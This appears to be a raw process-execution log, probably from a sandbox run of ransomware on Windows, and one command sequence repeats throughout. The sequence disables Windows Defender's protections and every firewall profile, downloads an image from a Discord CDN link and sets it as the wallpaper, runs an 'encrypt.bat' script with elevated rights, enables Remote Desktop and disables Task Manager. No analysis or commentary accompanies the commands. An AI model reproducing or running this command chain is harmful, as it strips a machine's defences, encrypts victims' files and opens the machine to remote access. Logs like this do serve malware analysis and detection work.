powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

